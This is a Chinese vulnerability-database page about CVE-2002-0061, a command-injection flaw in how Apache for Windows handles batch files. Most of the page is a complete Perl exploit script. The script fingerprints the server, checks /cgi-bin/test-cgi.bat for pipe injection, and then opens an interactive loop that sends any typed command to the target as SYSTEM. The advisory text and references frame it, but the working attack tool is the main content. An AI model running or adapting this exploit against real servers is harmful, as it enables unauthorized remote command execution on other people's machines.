文章目录[隐藏]
Apache Win32批处理文件远程执行命令漏洞
漏洞ID | 1106651 | 漏洞类型 | 其他 |
发布时间 | 2002-03-21 | 更新时间 | 2021-06-07 |
CVE编号 | CVE-2002-0061 | CNNVD-ID | CNNVD-200203-045 |
漏洞平台 | Windows | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
Apache是使用最广泛的开放源码的Web服务器程序,分Unix和Windows两种发行版本。Windows版本的Apache在处理批处理文件的Web请求没有过滤一些特殊字符(比如\'\'|\'\'),远程攻击者可以利用这个漏洞在目标主机执行任意命令。Apache在Windows操作系统下一般都是以SYSTEM权限运行,所以会造成很大的危害。2.0.x系列的Windows版Apache默认安装都自带了一个test的批处理文件,这个文件可以利用来执行命令。其它任意可以通过Web访问的批处理文件都可以利用。
|漏洞EXP
source: http://www.securityfocus.com/bid/4335/info
Special characters (such as |) may not be filtered by the batch file handler when a web request is made for a batch file. As a result, a remote attacker may be able to execute arbitrary commands on the host running the vulnerable software.
It should be noted that webservers on Windows operating systems normally run with SYSTEM privileges.
The 2.0.x series of Apache for Microsoft Windows ships with a test batch file which may be exploited to execute arbitrary commands. Since this issue is in the batch file handler, any batch file which is accessible via the web is appropriate for the purposes of exploitation.
##########################################################
# http://www.securityfocus.com/bid/4335
# http://www.securityfocus.com/bid/2023
# www.spabam.org spabam.tk spabam.da.ru go.to/spabam
# Spawn bash style Shell with webserver uid
#
# Spabam 2003 PRIV8 code
# #hackarena irc.brasnet.org
# This Script is currently under development
#####################################################
use strict;
use IO::Socket;
my $host;
my $port;
my $command;
my $url;
my @results;
my $probe;
my @U;
my $shiz;
$U[1] = "/cgi-bin/test-cgi.bat?|";
$shiz = "|";
&intro;
&scan;
&choose;
&command;
&exit;
sub intro {
&help;
&host;
&server;
};
sub host {
print "\nHost or IP : ";
$host=<STDIN>;
chomp $host;
if ($host eq ""){$host="127.0.0.1"};
print "\nPort (enter to accept 80): ";
$port=<STDIN>;
chomp $port;
if ($port =~/\D/ ){$port="80"};
if ($port eq "" ) {$port = "80"};
};
sub server {
my $X;
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
$probe = "string";
my $output;
my $webserver = "something";
&connect;
for ($X=0; $X<=10; $X++){
$output = $results[$X];
if (defined $output){
if ($output =~/Apache/){ $webserver = "apache" };
};
};
if ($webserver ne "apache"){
my $choice = "y";
chomp $choice;
if ($choice =~/N/i) {&exit};
}else{
print "\n\nOK";
};
};
sub scan {
my $status = "not_vulnerable";
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
my $loop;
my $output;
my $flag;
$command="dir";
for ($loop=1; $loop < @U; $loop++) {
$flag = "0";
$url = $U[$loop];
$probe = "scan";
&connect;
foreach $output (@results){
if ($output =~ /Directory/) {
$flag = "1";
$status = "vulnerable";
};
};
if ($flag eq "0") {
}else{
};
};
if ($status eq "not_vulnerable"){
};
};
sub choose {
my $choice="1";
chomp $choice;
if ($choice > @U){ &choose };
if ($choice =~/\D/g ){ &choose };
if ($choice == 0){ &other };
$url = $U[$choice];
};
sub other {
my $other = "/cgi-bin/test-cgi.bat?|";
chomp $other;
$U[0] = $other;
};
sub command {
while ($command !~/quit/i) {
print "\nHELP QUIT URL SCAN Or Command
\n[$host]$ ";
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose };
if ($command =~/scan/i) { &scan };
if ($command =~/help/i) { &help };
$command =~ s/\s/+/g;
$probe = "command";
if ($command !~/quit|url|scan|help/) {&connect};
};
&exit;
};
sub connect {
my $connection = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => "$host",
PeerPort => "$port",
) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
$connection -> autoflush(1);
if ($probe =~/command|scan/){
print $connection "GET $url$command$shiz HTTP/1.1\r\nHost: $host\r\n\r\n";
}elsif ($probe =~/string/) {
print $connection "HEAD / HTTP/1.1\r\nHost: $host\r\n\r\n";
};
while ( <$connection> ) {
@results = <$connection>;
};
close $connection;
if ($probe eq "command"){ &output };
if ($probe eq "string"){ &output };
};
sub output{
print "\nOUTPUT FROM $host. \n\n";
my $display;
if ($probe eq "string") {
my $X;
for ($X=0; $X<=10; $X++) {
$display = $results[$X];
if (defined $display){print "$display";};
};
}else{
foreach $display (@results){
print "$display";
};
};
};
sub exit{
print "\n\n\n
ANDREA SPABAM 2002.";
print "\nspabam.da.ru spabam\@go.to";
print "\n\n\n";
exit;
};
sub help {
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\n
test-cgi.bat WindowZ 32 Apache vulnerability
Command Execution Exploit v2.6 by SPABAM 2003
http://www.securityfocus.com/bid/4335
" ;
print "\n
";
print "\n Apache Win32 1.3.6 win32 - Apache 2.0.34 -BETA win32
";
print "\n
note: WebFolder normally on C:\\Programmi\\Apache Group\\Apache\\htdocs";
print "\n";
print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
print "\n Command: SCAN URL HELP QUIT";
print "\n\n\n\n\n\n\n\n\n\n\n";
};
|参考资料
来源:BUGTRAQ
名称:20020321VulnerabilityinApacheforWin32batchfileprocessing-Remotecommandexecution
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=101674082427358&w=2
来源:www.apacheweek.com
链接:http://www.apacheweek.com/issues/02-03-29#apache1324
来源:BID
名称:4335
链接:http://www.securityfocus.com/bid/4335
来源:XF
名称:apache-dos-batch-command-execution(8589)
链接:http://www.iss.net/security_center/static/8589.php
来源:BUGTRAQ
名称:20020325Apache1.3.24Released!(fwd)
链接:http://online.securityfocus.com/archive/1/263927
本文由 华域联盟 原创撰写:华域联盟 » Apache Win32批处理文件远程执行命令漏洞
转载请保留出处和原文链接:https://www.cnhackhy.com/94066.htm